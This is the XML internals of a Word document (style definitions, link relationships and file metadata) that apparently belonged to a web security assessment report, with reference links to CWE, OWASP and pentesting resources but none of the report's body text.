    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Franklin Gothic Book" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TitlePage-Version">
    <w:name w:val="Title Page - Version"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Century Gothic" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:b/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="403"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD0B0F"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Spacer">
    <w:name w:val="*Spacer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyBlockLabelnonTOC">
    <w:name w:val="*Body Block Label (non TOC)"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableText-Small">
    <w:name w:val="Table Text - Small"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Times New Roman" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Table-HeaderText">
    <w:name w:val="Table - Header Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00BD0B0F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyBlockLine">
    <w:name w:val="*Body Block Line"/>
    <w:basedOn w:val="Spacer"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1620"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="auto"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Finding">
    <w:name w:val="*Finding"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FindingTableLabel">
    <w:name w:val="*Finding Table Label"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:right="-170"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableText">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="MS Mincho" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F1064"/>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58" w:type="dxa"/>
        <w:right w:w="58" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a4">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="58" w:type="dxa"/>
        <w:right w:w="58" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a5">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="58" w:type="dxa"/>
        <w:right w:w="58"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left w:w="58" w:type="dxa"/>
        <w:right w:w="58" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a8">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="58" w:type="dxa"/>
        <w:right w:w="58"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left w:w="58" w:type="dxa"/>
        <w:right w:w="58" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="af2">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="58" w:type="dxa"/>
        <w:right w:w="58" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="af3">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="58" w:type="dxa"/>
        <w:right w:w="58"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left w:w="58" w:type="dxa"/>
        <w:right w:w="58" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="af6">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="58" w:type="dxa"/>
        <w:right w:w="58" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="af7">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="58" w:type="dxa"/>
        <w:right w:w="58"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9">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="58" w:type="dxa"/>
        <w:right w:w="58" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="afa">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="58" w:type="dxa"/>
        <w:right w:w="58" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="afb">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="58" w:type="dxa"/>
        <w:right w:w="58" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00A262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0290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internal.vese.com/login.php"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vese.com/wp-admin" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intertek.com/blog/2022-08-23-cybersecurity/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html"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wordfence.com/learn/finding-removing-backdoor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pypi.org/project/pyfiglet/0.7/"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hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wordfence.com/learn/finding-removing-backdoors/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="Externa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wasp.org/www-community/attacks/SQL_Injection" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/understanding-reverse-shells/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techtarget.com/searchsecurity/tip/How-to-remove-ransomware-step-by-step" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/78.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://internal.vese.com"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QFEbXqxHQgA8DNjO5loPjWT2LA==">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21</Pages>
  <Words>2958</Words>
  <Characters>19438</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>647</Lines>
  <Paragraphs>407</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>21989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RF</dc:creator>
  <cp:lastModifiedBy>Andrea Silvestroni</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2022-11-19T22:54:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-15T17:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-19T22:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>